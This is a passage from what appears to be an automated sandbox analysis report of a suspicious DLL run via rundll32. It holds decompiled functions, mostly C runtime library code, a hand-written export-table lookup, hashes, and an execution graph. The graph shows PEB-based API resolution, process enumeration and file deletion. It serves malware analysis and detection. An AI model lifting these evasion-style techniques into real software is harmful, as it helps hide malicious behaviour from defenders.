                                                                                                                                0x100136ee
                                                                                                                                0x100136f1
                                                                                                                                0x100136f4
                                                                                                                                0x1001371d
                                                                                                                                0x10013724
                                                                                                                                0x10013726
                                                                                                                                0x100137a7
                                                                                                                                0x100137c2
                                                                                                                                0x100137c4
                                                                                                                                0x10013704
                                                                                                                                0x10013704
                                                                                                                                0x10013707
                                                                                                                                0x10013709
                                                                                                                                0x1001370c
                                                                                                                                0x1001370c
                                                                                                                                0x1001370c
                                                                                                                                0x1001370c
                                                                                                                                0x00000000
                                                                                                                                0x10013712
                                                                                                                                0x10013786
                                                                                                                                0x10013786
                                                                                                                                0x1001378b
                                                                                                                                0x10013791
                                                                                                                                0x10013794
                                                                                                                                0x10013796
                                                                                                                                0x10013799
                                                                                                                                0x10013799
                                                                                                                                0x10013799
                                                                                                                                0x10013799
                                                                                                                                0x00000000
                                                                                                                                0x1001379d
                                                                                                                                0x10013728
                                                                                                                                0x1001372b
                                                                                                                                0x10013731
                                                                                                                                0x10013734
                                                                                                                                0x1001375b
                                                                                                                                0x1001375e
                                                                                                                                0x10013764
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10013766
                                                                                                                                0x10013769
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x1001376b
                                                                                                                                0x1001376b
                                                                                                                                0x10013771
                                                                                                                                0x10013774
                                                                                                                                0x100136e2
                                                                                                                                0x100136e2
                                                                                                                                0x1001377d
                                                                                                                                0x00000000
                                                                                                                                0x1001377d
                                                                                                                                0x10013736
                                                                                                                                0x10013739
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x1001373d
                                                                                                                                0x1001374e
                                                                                                                                0x10013754
                                                                                                                                0x10013756
                                                                                                                                0x10013759
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10013759
                                                                                                                                0x100136f6
                                                                                                                                0x100136f9
                                                                                                                                0x100136fb
                                                                                                                                0x10013701
                                                                                                                                0x10013701
                                                                                                                                0x00000000
                                                                                                                                0x100136d1
                                                                                                                                0x100136d1
                                                                                                                                0x100136d6
                                                                                                                                0x100136da
                                                                                                                                0x100136da
                                                                                                                                0x00000000
                                                                                                                                0x100136d6
                                                                                                                                0x100136cf

                                                                                                                                APIs
                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100136E9
                                                                                                                                • __isleadbyte_l.LIBCMT ref: 1001371D
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 1001374E
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 100137BC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                • Opcode ID: d3c89b6fc4c9a062a63f27f63a21df55c94e1a7d2321eb3fceb2aa8cfa4a7bff
                                                                                                                                • Instruction ID: fe590c44e70f2d795bb3872b418c13e2d21e5b7396ab7666b262f08f3a11fc7a
                                                                                                                                • Opcode Fuzzy Hash: d3c89b6fc4c9a062a63f27f63a21df55c94e1a7d2321eb3fceb2aa8cfa4a7bff
                                                                                                                                • Instruction Fuzzy Hash: 1731C1B1B08296EFDB20DFA4C8849AE7BE5EF01261F11C5A8E4A49F1D1E730DD80DB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000A312, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 90%
                                                                                                                                			E1000A312(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x10019be8);
				E1000B078(__ebx, __edi, __esi);
				_t28 = E1000C3E3(__ebx, __edx, __edi, _t30);
				_t13 =  *0x1001bfd0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E1000BA3C(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x1001c0b8; // 0x4c42b20
					 *((intOrPtr*)(_t29 - 0x1c)) = E1000A2D4(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E1000A37C();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E1000C3E3(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E1000B5DD(_t25, _t26, 0x20);
				}
				return E1000B0BD(_t28);
			}







                                                                                                                                0x1000a312
                                                                                                                                0x1000a312
                                                                                                                                0x1000a312
                                                                                                                                0x1000a312
                                                                                                                                0x1000a312
                                                                                                                                0x1000a314
                                                                                                                                0x1000a319
                                                                                                                                0x1000a323
                                                                                                                                0x1000a325
                                                                                                                                0x1000a32d
                                                                                                                                0x1000a351
                                                                                                                                0x1000a353
                                                                                                                                0x1000a359
                                                                                                                                0x1000a35d
                                                                                                                                0x1000a360
                                                                                                                                0x1000a36b
                                                                                                                                0x1000a36e
                                                                                                                                0x1000a375
                                                                                                                                0x1000a32f
                                                                                                                                0x1000a32f
                                                                                                                                0x1000a333
                                                                                                                                0x00000000
                                                                                                                                0x1000a335
                                                                                                                                0x1000a33a
                                                                                                                                0x1000a33a
                                                                                                                                0x1000a333
                                                                                                                                0x1000a33f
                                                                                                                                0x1000a343
                                                                                                                                0x1000a348
                                                                                                                                0x1000a350

                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 1000A31E
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 1000A335
                                                                                                                                • __amsg_exit.LIBCMT ref: 1000A343
                                                                                                                                • __lock.LIBCMT ref: 1000A353
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3521780317-0
                                                                                                                                • Opcode ID: c0ebd1d46576063a12af14f4010ed9d9819538088b517b8c681bfaaf82e776c5
                                                                                                                                • Instruction ID: b1e1f08a56a87501fea7a796c9ae050b36c141db5c66e4cda01b9002c6fe19d4
                                                                                                                                • Opcode Fuzzy Hash: c0ebd1d46576063a12af14f4010ed9d9819538088b517b8c681bfaaf82e776c5
                                                                                                                                • Instruction Fuzzy Hash: A8F03639D44B14CAF750EB758842B4D72E0EB057D0F118359F450972DACB74BB81DB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10008086, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 89%
                                                                                                                                			E10008086(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E10007476(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E1000C3E3(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E1000C3E3(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E1000744F(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E10007E0B(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                                                                                                0x10008086
                                                                                                                                0x10008086
                                                                                                                                0x10008086
                                                                                                                                0x10008086
                                                                                                                                0x10008086
                                                                                                                                0x10008089
                                                                                                                                0x1000808f
                                                                                                                                0x1000809d
                                                                                                                                0x100080a3
                                                                                                                                0x100080ab
                                                                                                                                0x100080b7
                                                                                                                                0x100080bf
                                                                                                                                0x100080c7
                                                                                                                                0x100080db
                                                                                                                                0x100080dd
                                                                                                                                0x100080e1
                                                                                                                                0x100080e6
                                                                                                                                0x100080ec
                                                                                                                                0x100080ee
                                                                                                                                0x100080f0
                                                                                                                                0x100080f3
                                                                                                                                0x00000000
                                                                                                                                0x100080fa
                                                                                                                                0x100080ee
                                                                                                                                0x100080e1
                                                                                                                                0x100080db
                                                                                                                                0x100080c7
                                                                                                                                0x100080fb

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10007476: __getptd.LIBCMT ref: 1000747C
                                                                                                                                  • Part of subcall function 10007476: __getptd.LIBCMT ref: 1000748C
                                                                                                                                • __getptd.LIBCMT ref: 10008095
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 100080A3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 803148776-1018135373
                                                                                                                                • Opcode ID: cc39f70c6df1ec8a9d72b2261b0a05bbe24867e24c2bb5ffaaef02b389a9eb59
                                                                                                                                • Instruction ID: 4ae378a3382de2502ebb08fd23938688d74dd022792fb74f3eadc7f97f552db9
                                                                                                                                • Opcode Fuzzy Hash: cc39f70c6df1ec8a9d72b2261b0a05bbe24867e24c2bb5ffaaef02b389a9eb59
                                                                                                                                • Instruction Fuzzy Hash: E8016D38C003068AEBB4CF60C450A9EB7F5FF002E1F11842DE5C596AA6CF349A89CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10004855, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 75%
                                                                                                                                			E10004855(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t24;
				void* _t27;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edx;
				_push(0x44);
				E10007B2B(E1001544B, __ebx, __edi, __esi);
				E10001AA0(_t27 - 0x28, "invalid string position");
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				E100018F0(_t27 - 0x50, _t27 - 0x28);
				E10006B9C(_t27 - 0x50, 0x10019328);
				asm("int3");
				return 0 |  *((intOrPtr*)(E1000C3E3(__ebx, _t24, __edi, _t28) + 0x90)) != 0x00000000;
			}






                                                                                                                                0x10004855
                                                                                                                                0x10004855
                                                                                                                                0x10004855
                                                                                                                                0x1000485c
                                                                                                                                0x10004869
                                                                                                                                0x1000486e
                                                                                                                                0x10004879
                                                                                                                                0x10004887
                                                                                                                                0x1000488c
                                                                                                                                0x10007e9b

                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 1000485C
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10004887
                                                                                                                                  • Part of subcall function 10006B9C: RaiseException.KERNEL32(?,?,10007141,?,?,?,?,?,10007141,?,100191C4,1001C640,?,100010D3,00000000,00000003), ref: 10006BDE
                                                                                                                                Strings
                                                                                                                                • invalid string position, xrefs: 10004861
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                • String ID: invalid string position
                                                                                                                                • API String ID: 1961742612-1799206989
                                                                                                                                • Opcode ID: 5daf48936f8272c34142bea48f113902a28ff72f2cd38ad2eb0383bb24a2986b
                                                                                                                                • Instruction ID: a289488eb33a79d50a16d0c4e8742ffc37e96f116b2cec3b06e278b68cec2fa6
                                                                                                                                • Opcode Fuzzy Hash: 5daf48936f8272c34142bea48f113902a28ff72f2cd38ad2eb0383bb24a2986b
                                                                                                                                • Instruction Fuzzy Hash: A3D017B5C111089AEB04D7E0CC42FDD7338EF08391F840424B211AA08ADF74B689C722
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10004380, Relevance: 5.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E10004380() {
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t24;
				void* _t29;
				signed int _t30;
				signed int _t35;
				void* _t38;
				intOrPtr _t42;
				signed short _t43;
				intOrPtr _t45;
				signed short* _t48;
				intOrPtr* _t56;
				intOrPtr _t61;
				void* _t62;
				void* _t67;

				_t21 =  *((intOrPtr*)(_t67 + 4));
				_t42 =  *((intOrPtr*)(_t21 + 4));
				_t23 =  *_t21 + 0x78;
				 *((intOrPtr*)(_t67 + 4)) = _t42;
				if( *((intOrPtr*)(_t23 + 4)) != 0) {
					_t61 =  *_t23;
					_t24 =  *((intOrPtr*)(_t61 + _t42 + 0x18));
					_t62 = _t61 + _t42;
					if(_t24 == 0 ||  *((intOrPtr*)(_t62 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						_t43 =  *(_t67 + 0xc);
						if(_t43 >> 0x10 != 0) {
							_t56 =  *((intOrPtr*)(_t62 + 0x20)) + _t42;
							_t48 =  *((intOrPtr*)(_t62 + 0x24)) + _t42;
							_t38 = 0;
							if(_t24 <= 0) {
								goto L15;
							} else {
								while(1) {
									_t29 = E10003D40(_t43,  *_t56 + _t42);
									_t67 = _t67 + 8;
									if(_t29 == 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t56 = _t56 + 4;
									_t48 =  &(_t48[1]);
									if(_t38 <  *((intOrPtr*)(_t62 + 0x18))) {
										_t42 =  *((intOrPtr*)(_t67 + 0x14));
										_t43 =  *(_t67 + 0x18);
										continue;
									} else {
										SetLastError(0x7f);
										return 0;
									}
									goto L18;
								}
								_t30 =  *_t48 & 0x0000ffff;
								_t42 =  *((intOrPtr*)(_t67 + 0x14));
								goto L14;
							}
						} else {
							_t35 = _t43 & 0x0000ffff;
							_t45 =  *((intOrPtr*)(_t62 + 0x10));
							if(_t35 < _t45) {
								L15:
								SetLastError(0x7f);
								return 0;
							} else {
								_t30 = _t35 - _t45;
								L14:
								if(_t30 <=  *((intOrPtr*)(_t62 + 0x14))) {
									return  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x1c)) + _t30 * 4 + _t42)) + _t42;
								} else {
									goto L15;
								}
							}
						}
					}
				} else {
					SetLastError(0x7f);
					return 0;
				}
				L18:
			}


















                                                                                                                                0x10004380
                                                                                                                                0x10004384
                                                                                                                                0x10004389
                                                                                                                                0x10004390
                                                                                                                                0x10004394
                                                                                                                                0x100043a4
                                                                                                                                0x100043a6
                                                                                                                                0x100043aa
                                                                                                                                0x100043ae
                                                                                                                                0x10004458
                                                                                                                                0x10004461
                                                                                                                                0x100043be
                                                                                                                                0x100043be
                                                                                                                                0x100043cc
                                                                                                                                0x100043e2
                                                                                                                                0x100043e4
                                                                                                                                0x100043e6
                                                                                                                                0x100043ea
                                                                                                                                0x00000000
                                                                                                                                0x100043ec
                                                                                                                                0x100043f8
                                                                                                                                0x100043fe
                                                                                                                                0x10004403
                                                                                                                                0x10004408
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x1000440a
                                                                                                                                0x1000440b
                                                                                                                                0x1000440e
                                                                                                                                0x10004414
                                                                                                                                0x100043f0
                                                                                                                                0x100043f4
                                                                                                                                0x00000000
                                                                                                                                0x10004416
                                                                                                                                0x10004418
                                                                                                                                0x10004424
                                                                                                                                0x10004424
                                                                                                                                0x00000000
                                                                                                                                0x10004414
                                                                                                                                0x10004427
                                                                                                                                0x1000442a
                                                                                                                                0x00000000
                                                                                                                                0x1000442a
                                                                                                                                0x100043ce
                                                                                                                                0x100043ce
                                                                                                                                0x100043d1
                                                                                                                                0x100043d6
                                                                                                                                0x10004433
                                                                                                                                0x10004435
                                                                                                                                0x10004441
                                                                                                                                0x100043d8
                                                                                                                                0x100043d8
                                                                                                                                0x1000442e
                                                                                                                                0x10004431
                                                                                                                                0x10004453
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10004431
                                                                                                                                0x100043d6
                                                                                                                                0x100043cc
                                                                                                                                0x10004396
                                                                                                                                0x10004398
                                                                                                                                0x100043a0
                                                                                                                                0x100043a0
                                                                                                                                0x00000000

                                                                                                                                APIs
                                                                                                                                • SetLastError.KERNEL32(0000007F,10003A72,00000000,RunDLL,00000000,?), ref: 10004398
                                                                                                                                • SetLastError.KERNEL32(0000007F,00000010,00000000,00000000,0000000F,10003A72,00000000,RunDLL,00000000,?), ref: 10004435
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                • Opcode ID: 0756a869ee2afc72d1b676530dd526b8f4d6ef34df736b4a8b7d6015b700ec0c
                                                                                                                                • Instruction ID: 3d8fb55c1078b9c3f35441da5e404d388ad798ba477897f7a328dd853c4c4054
                                                                                                                                • Opcode Fuzzy Hash: 0756a869ee2afc72d1b676530dd526b8f4d6ef34df736b4a8b7d6015b700ec0c
                                                                                                                                • Instruction Fuzzy Hash: B221F0726442128FE700DF54EC84A5BB3E0EBA8391F13812AF984D7245DA35FC10C765
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Analysis Process: rundll32.exe PID: 6960 Parent PID: 6728 rundll32.exeCOMMON

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:30%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:1.7%
                                                                                                                                Total number of Nodes:955
                                                                                                                                Total number of Limit Nodes:23

                                                                                                                                Graph

                                                                                                                                execution_graph 4455 f5a645 4456 f4833e GetPEB 4455->4456 4457 f5a67e 4456->4457 4458 f45e96 4461 f4fd22 4458->4461 4468 f502d7 4461->4468 4462 f4817c GetPEB 4462->4468 4463 f48fe5 GetPEB RtlAllocateHeap 4463->4468 4464 f5765b GetPEB 4464->4468 4465 f57e8f GetPEB 4465->4468 4466 f45edb 4467 f4712f GetPEB 4467->4468 4468->4462 4468->4463 4468->4464 4468->4465 4468->4466 4468->4467 4470 f41a83 GetPEB 4468->4470 4471 f517f0 RtlFreeHeap GetPEB 4468->4471 4472 f544d7 4468->4472 4470->4468 4471->4468 4473 f54500 4472->4473 4474 f5915e GetPEB 4473->4474 4475 f54559 4474->4475 4475->4468 3340 f41577 3345 f4eec4 3340->3345 3344 f41660 3346 f4eee4 3345->3346 3357 f48fe5 3346->3357 3348 f4f040 3361 f42a5e 3348->3361 3353 f4ec03 3354 f4ec19 3353->3354 3355 f5915e GetPEB 3354->3355 3356 f4ec68 DeleteFileW 3355->3356 3356->3344 3358 f48ffa 3357->3358 3369 f47e0c 3358->3369 3360 f490a7 3360->3348 3360->3360 3362 f42a85 3361->3362 3411 f4e7ad 3362->3411 3365 f517f0 3366 f517ff 3365->3366 3414 f543cb 3366->3414 3374 f518d0 3369->3374 3373 f47ec0 3373->3360 3381 f5915e 3374->3381 3377 f5a025 3378 f5a040 3377->3378 3379 f5915e GetPEB 3378->3379 3380 f5a0a0 RtlAllocateHeap 3379->3380 3380->3373 3382 f47eae 3381->3382 3383 f5924b 3381->3383 3382->3377 3387 f4c87d 3383->3387 3385 f5925e 3390 f42b81 3385->3390 3394 f4166c GetPEB 3387->3394 3389 f4c91f 3389->3385 3392 f42ba0 3390->3392 3391 f42ca2 3391->3382 3392->3391 3395 f521b0 3392->3395 3394->3389 3396 f52322 3395->3396 3403 f4f074 3396->3403 3400 f52363 3401 f52397 3400->3401 3402 f42b81 GetPEB 3400->3402 3401->3391 3402->3401 3404 f4f089 3403->3404 3405 f5915e GetPEB 3404->3405 3406 f4f0d5 3405->3406 3406->3400 3407 f4f176 3406->3407 3408 f4f186 3407->3408 3409 f5915e GetPEB 3408->3409 3410 f4f1e1 3409->3410 3410->3400 3412 f5915e GetPEB 3411->3412 3413 f42aa4 3412->3413 3413->3365 3415 f543de 3414->3415 3416 f518d0 GetPEB 3415->3416 3417 f544bd 3416->3417 3420 f41342 3417->3420 3419 f4164c 3419->3353 3421 f4135c 3420->3421 3422 f5915e GetPEB 3421->3422 3423 f413bc RtlFreeHeap 3422->3423 3423->3419 4476 f4a552 4477 f4a62b 4476->4477 4478 f4a677 4477->4478 4479 f4db62 4 API calls 4477->4479 4480 f4a641 4479->4480 4481 f4b7bc 2 API calls 4480->4481 4482 f4a658 4481->4482 4483 f517f0 2 API calls 4482->4483 4483->4478 4484 f43f0e 4489 f440f6 4484->4489 4485 f4416b 4486 f4ee36 GetPEB 4486->4489 4487 f543cb 2 API calls 4487->4489 4488 f4eb26 GetPEB 4488->4489 4489->4485 4489->4486 4489->4487 4489->4488 4490 f42b19 2 API calls 4489->4490 4490->4489 3424 f45b1f 3430 f45b45 3424->3430 3425 f45dfc 3443 f42b19 3425->3443 3428 f45dfa 3430->3425 3430->3428 3432 f523a0 3430->3432 3436 f53fe4 3430->3436 3440 f590e0 3430->3440 3433 f523b5 3432->3433 3434 f5915e GetPEB 3433->3434 3435 f5240a Process32NextW 3434->3435 3435->3430 3437 f53ffd 3436->3437 3438 f5915e GetPEB 3437->3438 3439 f5406e Process32FirstW 3438->3439 3439->3430 3441 f5915e GetPEB 3440->3441 3442 f59151 CreateToolhelp32Snapshot 3441->3442 3442->3430 3444 f42b2e 3443->3444 3445 f5915e GetPEB 3444->3445 3446 f42b75 FindCloseChangeNotification 3445->3446 3446->3428 3447 f59c38 3452 f54572 3447->3452 3449 f59cc6 3489 f51452 3449->3489 3459 f55453 3452->3459 3456 f55d11 3698 f58225 3456->3698 3459->3456 3460 f556d8 3459->3460 3472 f4ec73 GetPEB 3459->3472 3475 f543cb RtlFreeHeap GetPEB 3459->3475 3479 f556c5 3459->3479 3481 f505ca GetPEB 3459->3481 3488 f517f0 2 API calls 3459->3488 3492 f4cdf7 3459->3492 3502 f48074 3459->3502 3506 f59a13 3459->3506 3513 f4d4f6 3459->3513 3519 f4b7bc 3459->3519 3523 f44390 3459->3523 3531 f51d81 3459->3531 3539 f55d25 3459->3539 3559 f53a9f 3459->3559 3569 f4db62 3459->3569 3581 f44d3c 3459->3581 3586 f56c51 3459->3586 3599 f459ec 3459->3599 3603 f4adc7 3459->3603 3608 f53239 3459->3608 3619 f515af 3459->3619 3626 f493ad 3459->3626 3632 f5884c 3459->3632 3635 f4aff9 3459->3635 3646 f50609 3459->3646 3657 f50ff8 3459->3657 3660 f4e1e9 3459->3660 3671 f4f908 3459->3671 3680 f445f9 3459->3680 3689 f4f1ed 3459->3689 3694 f4b4b3 3459->3694 3460->3449 3472->3459 3475->3459 3611 f4a8ae 3479->3611 3481->3459 3488->3459 3490 f5915e GetPEB 3489->3490 3491 f514b0 3490->3491 3495 f4d09e 3492->3495 3493 f4d224 3730 f45062 3493->3730 3495->3493 3497 f543cb 2 API calls 3495->3497 3500 f4d222 3495->3500 3714 f58fd1 3495->3714 3718 f41013 3495->3718 3723 f46196 3495->3723 3727 f42fa6 3495->3727 3497->3495 3500->3459 3504 f4808e 3502->3504 3503 f48166 3503->3459 3504->3503 3505 f4eccd RtlFreeHeap GetPEB LoadLibraryW RtlAllocateHeap 3504->3505 3505->3504 3509 f59b93 3506->3509 3507 f47e0c 2 API calls 3507->3509 3508 f59bf9 3734 f57f4d 3508->3734 3509->3507 3509->3508 3512 f59bf7 3509->3512 3738 f41462 3509->3738 3512->3459 3516 f4d6c3 3513->3516 3514 f4868b GetPEB 3514->3516 3516->3514 3518 f4d7a2 3516->3518 3783 f5a0b0 3516->3783 3791 f4595e 3516->3791 3518->3459 3520 f4b7d5 3519->3520 3521 f47e0c 2 API calls 3520->3521 3522 f4b8a3 3521->3522 3522->3459 3522->3522 3524 f443aa 3523->3524 3525 f47e0c 2 API calls 3524->3525 3527 f444cb 3525->3527 3526 f4450f 3526->3459 3527->3526 3809 f52766 3527->3809 3530 f543cb 2 API calls 3530->3526 3534 f5204e 3531->3534 3533 f44a84 2 API calls 3533->3534 3534->3533 3535 f42b19 2 API calls 3534->3535 3537 f521a3 3534->3537 3538 f4df2d GetPEB 3534->3538 3846 f4f0e0 3534->3846 3850 f51086 3534->3850 3535->3534 3537->3459 3538->3534 3542 f55d59 3539->3542 3545 f48fe5 GetPEB RtlAllocateHeap 3542->3545 3550 f543cb RtlFreeHeap GetPEB 3542->3550 3551 f56c43 3542->3551 3553 f56722 3542->3553 3555 f517f0 RtlFreeHeap GetPEB 3542->3555 3557 f47e0c 2 API calls 3542->3557 3854 f44f73 3542->3854 3860 f46212 3542->3860 3867 f42ff8 3542->3867 3888 f450e1 3542->3888 3900 f48399 3542->3900 3904 f49e02 3542->3904 3915 f51a67 3542->3915 3918 f41a83 3542->3918 3922 f45edf 3542->3922 3931 f4919c 3542->3931 3935 f532b2 3542->3935 3545->3542 3550->3542 3551->3459 3556 f543cb 2 API calls 3553->3556 3555->3542 3556->3551 3557->3542 3560 f53d65 3559->3560 3565 f53d9f 3560->3565 3566 f47e0c 2 API calls 3560->3566 3568 f53db1 3560->3568 4064 f5765b 3560->4064 4068 f4a681 3560->4068 4072 f50b16 3560->4072 